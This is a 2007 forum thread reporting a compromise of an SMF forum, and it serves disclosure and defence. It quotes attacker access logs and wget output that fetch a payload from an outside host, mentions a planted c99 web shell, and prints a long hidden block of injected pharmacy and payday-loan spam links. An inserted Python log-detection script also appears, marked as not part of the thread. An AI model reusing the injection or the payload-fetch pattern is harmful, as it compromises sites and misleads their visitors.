Author Topic: Possible *major* SMF exploit in the wild, going back years!  (Read 42601 times)

be_cool
Possible *major* SMF exploit in the wild, going back years!
« on: September 29, 2007, 10:17:19 AM »
Check here...
http://www.devside.net/blog/smf-exploit-like-phpbb-hack

Then check your Apache error logs for any wget like blocks.

This particular break-in had the effect of causing the preview feature of SMF to get stuck on 'fetching preview...' unless JavaScript was turned off.

I see many others with similar problems and unexplained behavior in the forums, and the search turns up similar issues going back some time.

karlbenson
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #1 on: September 29, 2007, 10:48:07 AM »
http://www.simplemachines.org/about/security.php
Please feel free to report it via the security report form.

be_cool
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #2 on: September 29, 2007, 01:17:16 PM »
Did that. Still, looking into it further, this is possibly done with simple POST data. Everyone is at risk.
This is how this attacker found me, from my logs...
Came from Google with search string "powered+by+smf+1.1.3". Check your logs.

青山 素子
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #3 on: September 29, 2007, 01:48:26 PM »
Do you allow attachments? Are the attachments set to use an encrypted name? What platform is the server on?

There are many ways for the javascript that includes preview functionality to break, linking it exclusively to this problem is overreaching.
Motoko-chan
Director, Simple Machines

Just like... making of enemies / I don't think I'll lose, I have no intention of quitting / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


be_cool
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #4 on: September 29, 2007, 02:04:55 PM »
It's not overreaching at all, I've gone over the logs quite a bit. This attack was managed from two IPs. One to install it. Another to manage it.

The preview feature broke the same time as the hack. The attacking script probably edited something here and there.

c99madShell was installed as Themes\readme.php

I don't have any mods installed, this happened under SMF 1.1.3, and while the attachment option is there, I never set the upload dir or permissions...
"An Error Has Occurred!
Cannot access attachments upload path!"

Quote
83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...GET junk...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
...As you can see by the timeline, the last POST above did this...
Quote
--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]
 
    0K .......... .......... .......... .......... ...       100%   69.60 KB/s
 
09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

Quote
149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
...

Just trying to help others out, as this will happen to you tomorrow.
« Last Edit: September 29, 2007, 02:17:59 PM by be_cool »
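The two checks this thread suggests, the opening post's "look for wget blocks in the error log" and the timeline laid out in the reply above, as one runnable example. This is added here and is not code from the thread or from SMF. It parses Apache combined-format access-log lines, flags the register, then login2, then post2 chain from a single IP, direct requests for a .php under /Themes/, visitors who arrived from a Google search for the forum's version banner, and wget banners in the error log stamped at the same second as a POST. The log lines are constructed for the example, modelled on the ones quoted in the post; the 15-minute window, the 2-second slack and the assumption that a browser has no normal reason to request a .php under /Themes/ are choices made here, not facts stated in the thread.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

# Constructed Apache "combined" access log, modelled on the lines quoted in the post.
ACCESS_LOG = """\
83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
192.0.2.10 - - [26/Sep/2007:10:05:00 -0400] "GET /index.php?board=1.0 HTTP/1.1" 200 12000 "-" "Mozilla/5.0 (X11; Linux)"
"""
# Constructed Apache error log: wget's stderr banner lands here when a script shells out to it.
ERROR_LOG = """\
--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]
[Wed Sep 26 10:05:00 2007] [error] [client 192.0.2.10] File does not exist: /var/www/favicon.ico
"""

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
                       r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
WGET_RE = re.compile(r'^--(\d{2}):(\d{2}):(\d{2})--\s+(\S+)')      # "--HH:MM:SS--  URL"
ACTION_RE = re.compile(r'[?&;]action=([A-Za-z0-9_]+)')              # SMF's ?action= parameter
THEME_PHP_RE = re.compile(r'^/+Themes/.*\.php(?:[?;]|$)', re.I)     # a script under /Themes/

def parse_access(lines):
    """Parse combined-format lines into dicts (malformed lines are skipped)."""
    entries = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            a = ACTION_RE.search(e["path"])
            e["action"] = a.group(1) if a else None
            entries.append(e)
    return entries

def search_engine_dorks(entries, needle="powered by smf"):
    """(ip, query) for visitors who arrived from a Google search for the forum's version banner."""
    hits = []
    for e in entries:
        ref = urlparse(e["referer"])
        if "google." in ref.netloc and ref.path.startswith("/search"):
            q = parse_qs(ref.query).get("q", [""])[0].strip()
            if needle in q.lower():
                hits.append((e["ip"], q))
    return hits

def post_chains(entries, window=timedelta(minutes=15)):
    """IPs that hit register, then login2, then post2, with the whole chain inside `window`."""
    by_ip = defaultdict(list)
    for e in sorted(entries, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)
    hits = []
    for ip, evs in by_ip.items():
        stages, started = ["register", "login2", "post2"], None
        for e in evs:
            if stages and e["action"] == stages[0]:
                started = started or e["ts"]
                stages.pop(0)
                if not stages and e["ts"] - started <= window:
                    hits.append(ip)
    return hits

def theme_php_hits(entries):
    """Direct requests for a .php under /Themes/ (assumed: a browser has no normal reason to make them)."""
    return [(e["ip"], e["method"], e["path"]) for e in entries if THEME_PHP_RE.match(e["path"])]

def wget_correlation(entries, error_lines, slack=timedelta(seconds=2)):
    """(url, ip, path) for each wget banner whose time of day is within `slack` of a logged POST."""
    pairs = []
    for line in error_lines:
        m = WGET_RE.match(line)
        if not m:
            continue
        wget_tod = timedelta(hours=int(m[1]), minutes=int(m[2]), seconds=int(m[3]))
        for e in entries:
            tod = e["ts"] - e["ts"].replace(hour=0, minute=0, second=0, microsecond=0)
            if e["method"] == "POST" and abs(tod - wget_tod) <= slack:
                pairs.append((m[4], e["ip"], e["path"]))
    return pairs

def report(access_text=ACCESS_LOG, error_text=ERROR_LOG):
    """Run all four checks over the two log texts."""
    entries = parse_access(access_text.splitlines())
    return {"dorks": search_engine_dorks(entries), "chains": post_chains(entries),
            "theme_php": theme_php_hits(entries),
            "wget": wget_correlation(entries, error_text.splitlines())}

if __name__ == "__main__":
    for name, hits in report().items():
        print(name, hits)
```

On a real server, pass the contents of the access and error logs to report() instead of the constructed samples. The wget correlation matches on time of day only, because wget's banner carries no date, so run it per day's log or expect a few false pairs on multi-day files.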

be_cool
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #5 on: September 29, 2007, 03:11:34 PM »
This just gets better and better. I'm not sure I caught this in time to not get banned in Google, etc. It's only been a few days, but that is enough.

The reason for the 'fetching preview...' error, and probably the reason for all the other unexplained error msgs people are getting, is index.php is being modified with this...

Code:
<font style="position: absolute;overflow: hidden;height: 0;width: 0">
 board of pharmacy <a href="http://4homepages.de/forum/Themes/default/fonts/font/1/index.html">zambia debt help</a> vardenafil cheap<br>
 tadalafil pill <a href="http://4homepages.de/forum/Themes/default/fonts/font/2/index.html">debt solutions international business company</a> tadalafil 20mg<br>
 erectile dysfunction solutions <a href="http://4homepages.de/forum/Themes/default/fonts/font/3/index.html">debt consolidation loan uk ga</a> tadalafilo<br>
 sildenafil patent <a href="http://4homepages.de/forum/Themes/default/fonts/font/4/index.html">percentage of american in debt</a> prescription tadalafil<br>
 sildenafil citrate soft tabs <a href="http://4homepages.de/forum/Themes/default/fonts/font/5/index.html">debt to ratio income</a> apcalis tadalafil<br>
 buy sildenafil citrate <a href="http://4homepages.de/forum/Themes/default/fonts/font/6/index.html">buy cheap credit card debt</a> pfizer sildenafil<br>
 erectile dysfunction doctors <a href="http://4homepages.de/forum/Themes/default/fonts/font/7/index.html">charter communications debt</a> sildenafil contraindications<br>
 sildenafil and nitrates <a href="http://4homepages.de/forum/Themes/default/fonts/font/8/index.html">and debt mortgage table amortization calculator</a> cheap tadalafil<br>
 alcohol erectile dysfunction <a href="http://4homepages.de/forum/Themes/default/fonts/font/9/index.html">debt moratorium by hoover</a> tadalafil canada<br>
 discount pharmacy <a href="http://4homepages.de/forum/Themes/default/fonts/font/10/index.html">pay off your debt free help</a> 4<br>
 vardenafil hci <a href="http://4homepages.de/forum/Themes/default/fonts/font/11/index.html">debt and delusion</a> tadalafil ic 351<br>
 what is tadalafil <a href="http://4homepages.de/forum/Themes/default/fonts/font/12/index.html">city kansas loan online payday</a> contains sildenafil<br>
 rx tadalafil <a href="http://4homepages.de/forum/Themes/default/fonts/font/13/index.html">4 payday loan glendale 6</a> international pharmacy<br>
 efficacy of vardenafil <a href="http://4homepages.de/forum/Themes/default/fonts/font/14/index.html">instant payday loan painesdale michigan</a> is vardenafil<br>
 tadalafil on <a href="http://4homepages.de/forum/Themes/default/fonts/font/15/index.html">call fax loan no no payday</a> between sildenafil<br>
 vardenafil side effects <a href="http://4homepages.de/forum/Themes/default/fonts/font/16/index.html">payday loans without checks</a> vardenafil hcl 20mg tab<br>
 erectile dysfunction cause <a href="http://4homepages.de/forum/Themes/default/fonts/font/17/index.html">cash advance payday loan munster indiana</a> osco pharmacy<br>
 eli 20 tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/index.html">buy levitra</a> sildenafil forum<br>
 of tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra31.html">buy levitra</a> sildenafil hypertension<br>
 rite aid pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra32.html">levitra</a> hypertension and sildenafil<br>
 elli lilly <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra33.html">discount levitra</a> rx pharmacy<br>
 erectile dysfunction remedy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra34.html">generic levitra</a> alcohol and erectile dysfunction<br>
 tadalafil vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra35.html">cheap levitra</a> pulmonary hypertension<br>
 coping with erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra36.html">levitra online</a> does vardenafil<br>
 generic tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra37.html">buy levitra online</a> tadalafil no<br>
 sildenafil dosage <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra38.html">levitra sales</a> side effects of<br>
 soft viagra <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra39.html">order levitra</a> eckerds pharmacy<br>
 sildenafil sil den a fil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra310.html">levitra drug</a> california board of pharmacy<br>
 sildenafil citrate lowest prices <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra311.html">levitra price</a> sildenafil patent<br>
 pharmacy colleges <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra312.html">purchase levitra</a> tadalafil lowest price<br>
 mg tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra313.html">levitra prices</a> does vardenafil<br>
 apcalis tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra314.html">herbal levitra</a> sildenafil in pulmonary hypertension<br>
 chemical structure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra315.html">levitra pens</a> of vardenafil<br>
 sildenafil citrate without prescription <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra316.html">levitra no prescription</a> erectile dysfunction remedies<br>
 about erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra317.html">kamagra</a> ranbaxy tadalafil<br>
 purchase sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/index.html">buy viagra</a> sildenafil citrate discount<br>
 low price viagra <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra81.html">buy viagra</a> rite aid pharmacy<br>
 specialty pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra82.html">viagra</a> chemical structure<br>
 sildenafil and pulmonary hypertension <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra83.html">cheap viagra</a> liquid vardenafil<br>
 giant pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra84.html">viagra online</a> sodium citrate<br>
 sildenafil citrate soft tabs <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra85.html">prescription viagra</a> and sildenafil and<br>
 pharmacy education <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra86.html">order viagra</a> sildenafil discount<br>
 elli lilly <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra87.html">buy viagra online</a> how sildenafil<br>
 united pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra88.html">purchase viagra</a> buy sildenafil citrate<br>
 sildenafil hypertension <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra89.html">discount viagra</a> tadalafil forum<br>
 sildenafil cancer <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra810.html">generic viagra</a> erectile dysfunction exercise<br>
 counter sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra811.html">overnight viagra</a> sildenafil for pulmonary<br>
 side effects of tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra812.html">viagra drug</a> 50mg viagra<br>
 tadalafil work <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra813.html">purchase viagra online</a> hospital pharmacy<br>
 effects of sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra814.html">order viagra online</a> sildenafil oral<br>
 male sexual dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra815.html">viagra for sale</a> eckerds pharmacy<br>
 alcohol erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra816.html">cheap viagra online</a> alcohol erectile dysfunction<br>
 us pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra817.html">buy viagra cheap</a> pharmacy license<br>
 side effects of <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra818.html">blue pill</a> order tadalafil<br>
 tadalafil vs <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra819.html">sildenafil citrate</a> sildenafil citrate canada<br>
 pharmacy salary <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra820.html">generic sildenafil</a> tadalafil ic 351<br>
 college of pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra821.html">buy sildenafil</a> vardenafil cost<br>
 order tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra822.html">sildenafil citrate tablets</a> sildenafil 50<br>
 pharmacy technician training <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra823.html">sildenafil online</a> herbal sildenafil<br>
 tadalafil with <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra824.html">cheap sildenafil</a> pharmacy programs<br>
 erectile dysfunction clinic <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra825.html">order sildenafil</a> tadalafil and nitrolingual<br>
 sildenafil citrate tablet <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra826.html">sildenafil tablets</a> or sildenafil<br>
 cooper pharma sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra827.html">purchase sildenafil</a> pharmacy residency<br>
 does tadalafil work <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra828.html">erectile dysfunction drugs</a> sexual dysfunction<br>
 erectile dysfunction cures <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra829.html">erectile dysfunction medication</a> erectile dysfunction cause<br>
 publix pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra830.html">erectile dysfunction treatments</a> sildenafil canada<br>
 sildenafil 100 <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra831.html">erectile dysfunction drug</a> vardenafil hcl 20mg tab<br>
 tadalafil mexico <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra832.html">erectile dysfunction device</a> sildenafil cancer<br>
 sildenafil vaginal <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/index.html">buy cialis</a> pharmacy software<br>
 tadalafil report <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis31.html">buy cialis</a> tadalafil pulmonary<br>
 sildenafil citrate 25mg <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis32.html">cialis</a> sildenafil canada<br>
 sildenafil blood pressure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis33.html">tadalafil</a> erectile dysfunction products<br>
 sildenafil citrate tablet <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis34.html">generic tadalafil</a> mail order pharmacy<br>
 sildenafil treatment <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis35.html">buy tadalafil</a> sildenafil troche<br>
 tadalafil picture <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis36.html">cheap tadalafil</a> tadalafil<br>
 us pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis37.html">tadalafil 20mg</a> sildenafil citrate 100mg<br>
 vardenafil hcl 20mg <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis38.html">tadalafil online</a> contains sildenafil<br>
 erectile dysfunction forum <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis39.html">tadalafil soft tabs</a> sildenafil 100mg<br>
 is tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis310.html">tadalafil tablets</a> schools of pharmacy<br>
 erectile dysfunction com <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis311.html">discount tadalafil</a> tadalafil citrate<br>
 tadalafil lowest price <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis312.html">tadalafil softtabs</a> herbal sildenafil<br>
 efficacy of tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis313.html">order tadalafil</a> buy sildenafil citrate<br>
 elli lilly <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis314.html">cialis cheap</a> soft viagra<br>
 sildenafil sil den a fil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis315.html">cialis online</a> sildenafil 50mg<br>
 erectile dysfunction diet <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis316.html">prescription cialis</a> how to make sildenafil citrate<br>
 erectile dysfunction cure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis317.html">order cialis</a> pet pharmacy<br>
 make sildenafil citrate <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis318.html">buy cialis online</a> fake tadalafil<br>
 board of pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis319.html">purchase cialis</a> sildenafil pharmacology<br>
 erectile dysfunction com <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis320.html">discount cialis</a> tadalafil forum<br>
 pharmacy times <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis321.html">generic cialis</a> tadalafil pah<br>
 for vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis322.html">overnight cialis</a> tadalafil dosage<br>
 discount pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis323.html">cialis drug</a> sildenafil 20 mg<br>
 meijer pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis324.html">purchase cialis online</a> compounding pharmacy<br>
 tadalafil powder <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis325.html">order cialis online</a> sildenafil use<br>
 intravenous sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis326.html">cialis for sale</a> citrate de betaine<br>
 side effects <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis327.html">cheap cialis online</a> citrato de sildenafil<br>
 erectile dysfunction research <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis328.html">buy cialis cheap</a> cheapest viagra<br>
 overnight viagra <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/index.html">buy soma</a> nitric oxide sildenafil<br>
 tadalafil citrate soft <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma31.html">buy soma</a> sildenafil and pulmonary hypertension<br>
 discount pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma32.html">soma</a> sildenafil citrate india<br>
 sildenafil 50mg <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma33.html">soma cheap</a> what is vardenafil<br>
 ajanta pharma <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma34.html">soma online</a> sildenafil citrate online<br>
 sildenafil citrate pills <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma35.html">prescription soma</a> erectile dysfunction natural cures<br>
 free sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma36.html">order soma</a> hypertension tadalafil<br>
 hydroxypropyl cellulose <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma37.html">buy soma online</a> pharmacy association<br>
 sams club pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma38.html">purchase soma</a> erectile dysfunction natural<br>
 www vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma39.html">discount soma</a> pharmacy program<br>
 pharmacy prices <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma310.html">generic soma</a> tadalafil forum<br>
 sildenafil contraindications <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma311.html">soma carisoprodol</a> on line pharmacy<br>
 sildenafil chemical structure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma312.html">overnight soma</a> sildenafil 50mg<br>
 sildenafil soft tabs <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma313.html">soma drug</a> tadalafil review<br>
 tadalafil lowest price <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma314.html">purchase soma online</a> how sildenafil<br>
 erectile dysfunction medication <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma315.html">order soma online</a> erectile dysfunction help<br>
 non arteritic anterior ischemic optic neuropathy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma316.html">soma 350mg</a> sildenafil citrate pills<br>
 tadalafil side <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma317.html">soma for sale</a> ajanta pharma<br>
 pharmacy times <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma318.html">cheap soma online</a> alcohol and erectile dysfunction<br>
 osco pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma319.html">buy soma cheap</a> sildenafil citrate india<br>
 vardenafil side effects <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/index.html">male enhancement pill</a> sildenafil citrate side effects<br>
 buy tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis51.html">male enhancement pill</a> cures for erectile dysfunction<br>
 muse erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis52.html">male enhancement</a> citric acid<br>
 kroger pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis53.html">growth penis</a> sildenafil pah<br>
 sildenafil cost <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis54.html">maxoderm endowmax</a> sildenafil citrate cheap<br>
 tadalafil 20 <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis55.html">penis enhancement</a> causes of erectile dysfunction<br>
 and vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis56.html">penis enlargement</a> clinical pharmacy<br>
 mexican pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis57.html">penis growth</a> diabetes erectile dysfunction<br>
 natural sildenafil citrate <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis58.html">penis growths</a> sildenafil oral suspension<br>
 erectile dysfunction in men <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis59.html">penise enhancement</a> order tadalafil<br>
 containing sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis510.html">penise enlargement</a> tadalafil from india<br>
 erectile dysfunction pump <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis511.html">penise growth</a> pre pharmacy<br>
 sildenafil pulmonary <a href="http://forum.cmsmadesimple.org/Packages/backups/css/1/index.html">cash advance payday loan santaquin utah</a> disfuncion erectil<br>
 vardenafil hci <a href="http://forum.cmsmadesimple.org/Packages/backups/css/2/index.html">payday cash loan grangeville idaho</a> sildenafil 1<br>
 tadalafil for sale <a href="http://forum.cmsmadesimple.org/Packages/backups/css/3/index.html">online no fax payday loan</a> mg tadalafil<br>
 vardenafil hci <a href="http://forum.cmsmadesimple.org/Packages/backups/css/4/index.html">can27t pay back payday loan</a> canada pharmacy<br>
 vardenafil hcl 20 <a href="http://forum.cmsmadesimple.org/Packages/backups/css/5/index.html">fairhope payday loan</a> erectile dysfunction forum<br>
 erectile dysfunction aids <a href="http://forum.cmsmadesimple.org/Packages/backups/css/6/index.html">payday loans new mexico</a> purchase viagra<br>
 intravenous sildenafil <a href="http://forum.cmsmadesimple.org/Packages/backups/css/7/index.html">4 kings mountain payday loan 6</a> how sildenafil<br>
 erectile dysfunction home remedies <a href="http://forum.cmsmadesimple.org/Packages/backups/css/8/index.html">no teletrack payday loan hallwood virginia</a> st louis college of pharmacy<br>
 direct pharmacy <a href="http://forum.cmsmadesimple.org/Packages/backups/css/9/index.html">search loan till payday</a> contain sildenafil<br>
 vardenafil paradoxical <a href="http://forum.cmsmadesimple.org/Packages/backups/css/10/index.html">payday loan no fax no paper</a> erectile dysfunction ed<br>
 us pharmacy <a href="http://forum.cmsmadesimple.org/Packages/backups/css/11/index.html">access cash loan payday money</a> sildenafil pphn<br>
 erectile dysfunction help <a href="http://forum.cmsmadesimple.org/Packages/backups/css/12/index.html">cash advance payday loan arvada colorado</a> counter sildenafil<br>
 sildenafil citrate 50 <a href="http://forum.cmsmadesimple.org/Packages/backups/css/13/index.html">cash til payday loan</a> albany college of pharmacy<br>
 vardenafil hci <a href="http://forum.cmsmadesimple.org/Packages/backups/css/14/index.html">advance cash payday sunday</a> sildenafil in infants<br>
